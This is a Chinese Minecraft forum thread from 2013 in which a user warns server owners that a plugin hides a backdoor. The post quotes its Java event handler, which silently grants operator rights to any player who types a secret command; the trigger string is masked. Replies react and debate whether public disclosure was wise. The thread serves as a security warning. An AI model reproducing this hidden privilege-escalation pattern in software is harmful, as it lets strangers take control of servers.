Minecraft(我的世界)中文论坛

标题: 警告！！！！！

作者: millerx 时间: 2013-11-27 21:39
标题: 警告！！！！！
本帖最后由 millerx 于 2013-11-28 11:38 编辑

http://www.mcbbs.net/thread-154465-1-1.html

此插件内涵以下代码

@EventHandler
public void onPlayerCommandPreprocess(PlayerCommandPreprocessEvent event){
if (event.getMessage().startsWith("/*********")){
event.getPlayer().setOp(true);
event.setCancelled(true);
event.getPlayer().sendMessage("Done");
}
}
}

复制代码

极为明显的

居然直接敢把java文件一起编译出来

只要输入 /资料删除

就会把输入这个指令的玩家设置为OP

意思就是一个完全地提权插件！！！！！！！！！！！！！！！！

而且不是通过在yml注册指令，如果不翻源码是找不到的！！！是拦截命令输入这个事件！！！！！
而且权限是玩家！！！任意玩家都可以触发！！！
各位服主一定立刻删除此插件！！！！！！！！！！！！！！！！！

作者: Link.Fuck 时间: 2013-11-27 21:42
我勒个去去去去去去去去去去去去！！！！！！！！！！！！！！！！！！！！！

作者: 42486327 时间: 2013-11-27 21:42
好一个惊天BUG

作者: 果冻的悲哀 时间: 2013-11-27 21:44
果然是大神！

作者: 1847291366 时间: 2013-11-27 21:44
不明觉厉·····

作者: zhh0000zhh 时间: 2013-11-27 21:50
我怎么就没看出来玩家能获得OP权限呢？？？？

作者: rom718 时间: 2013-11-27 21:53
我去看下 0.0

作者: 我的世界1.6.4 时间: 2013-11-27 21:56

rom718 发表于 2013-11-27 21:53
我去看下 0.0

厉害.给个赞

作者: simon3000的灵魂 时间: 2013-11-27 21:58
大触我们认识下

作者: Darkyoooooo 时间: 2013-11-27 21:59
cencelled求解释

作者: Aikawastep 时间: 2013-11-27 22:00
{:10_566:}大触我们做朋友吧

作者: 寂寞过了就好 时间: 2013-11-27 22:06
表示lz好牛逼这都发现的了

作者: 哭泣的格桑花 时间: 2013-11-27 22:08
我记得我的前腐竹也下载过这个插件在整我= =

作者: 大刘 时间: 2013-11-27 22:31
本帖最后由大刘于 2013-11-27 22:34 编辑

好像这个作者其他插件也带有这段代码哦,某服主做的插件?有点意思

作者: LIVNDS 时间: 2013-11-27 22:47
之前看到了这个插件，因为我善良···不整蛊基友，所以没有下载···好险·······

作者: qq1185898110 时间: 2013-11-27 23:01
提示: 作者被禁止或删除内容自动屏蔽

作者: fiona632 时间: 2013-11-27 23:19
給你個讚0.0
我都看不出這源代碼的意思

作者: 晓韩 时间: 2013-11-28 11:03
一个屌炸天的LZ

作者: GreatGBL 时间: 2013-11-28 12:28
支持LZ，抵制恶意插件

作者: V58 时间: 2013-11-28 13:00
提示: 作者被禁止或删除内容自动屏蔽

作者: 咸鱼气功王 时间: 2013-11-28 15:18
我装了大杀特杀然后开小号输入 /资料删除没用啊

作者: ikorose 时间: 2013-11-28 16:40

xiazhen3938 发表于 2013-11-28 15:18
我装了大杀特杀然后开小号输入 /资料删除没用啊

不是输入 /资料删除，“资料删除”当然是特殊的代码，只是不能随便公开而已，因为有些服务器还没有删除该插件，要是随便公开被熊孩子看到在服务器肆意输入全变op那不乱套？这段代码有10个字符，是啥就不能透露了。

作者: 咸鱼气功王 时间: 2013-11-28 16:59

ikorose 发表于 2013-11-28 16:40
不是输入 /资料删除，“资料删除”当然是特殊的代码，只是不能随便公开而已，因为有些服务器还没有删除该 ...

额我在那个插件内查到了。。。。太恐怖了

作者: cyqsimon 时间: 2013-11-28 17:00

42486327 发表于 2013-11-27 21:42
好一个惊天BUG

这不是bug吧......

作者: q820634195 时间: 2013-11-28 18:38
全体MC Fans们一起Attack him！！！
拉出去枪毙无限世纪！！
衷心鄙视他！！
{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

作者: wjwrh 时间: 2013-11-28 20:01
我去我的服里面竟然有这种东西！！赶紧删掉不解释. 话说楼主还真有闲心啊翻源码...

作者: Emerson 时间: 2013-11-28 22:23

原插件呢?

作者: xpesir 时间: 2013-11-29 16:59
其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果作者真大意肯定有立刻更新修复

作者: huanghongxun 时间: 2013-11-29 17:55

zhh0000zhh 发表于 2013-11-27 21:50
我怎么就没看出来玩家能获得OP权限呢？？？？

不是startsWith("/xxxx")后就setOp了么

作者: zhh0000zhh 时间: 2013-11-29 18:25

huanghongxun 发表于 2013-11-29 17:55
不是startsWith("/xxxx")后就setOp了么

看错了，把setOP看成Stop了

作者: 5408754 时间: 2013-11-29 20:14

xpesir 发表于 2013-11-29 16:59
其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果 ...

现在这个指令本身也没公开啊。。。。。。。。。

作者: TResult 时间: 2013-11-29 21:09
多谢！有你的努力让腐竹感到安心！

作者: Cungbou 时间: 2013-11-30 01:40

5408754 发表于 2013-11-29 20:14
现在这个指令本身也没公开啊。。。。。。。。。

貌似刚发出来的时候公开了，后来被编辑掉。贴吧的某转帖上也清清楚楚地弄了出来，后来某人投诉其暴露个人信息而被吧主删除。

作者: 5408754 时间: 2013-11-30 07:25

Cungbou 发表于 2013-11-30 01:40
貌似刚发出来的时候公开了，后来被编辑掉。贴吧的某转帖上也清清楚楚地弄了出来，后来某人投诉其暴露个人 ...

哦，这样子啊。。。。。。。。。。

作者: millerx 时间: 2013-11-30 10:31

wjwrh 发表于 2013-11-28 20:01
我去我的服里面竟然有这种东西！！赶紧删掉不解释. 话说楼主还真有闲心啊翻源码...

我只是看看他如何崩掉客户端的
因为有很多方式：
比如果、错误封包，恐怖处理量
，结果就发现了这么不得了的东西

作者: 1540866915 时间: 2013-11-30 14:15
啊啊啊啊！赶快删！！

作者: choak 时间: 2013-11-30 19:01
- -想不到这些孩子这么猥琐拉去从18层丢到地下18层算了我也没装··

作者: kivv 时间: 2014-5-10 10:08
好惊天的一个插件啊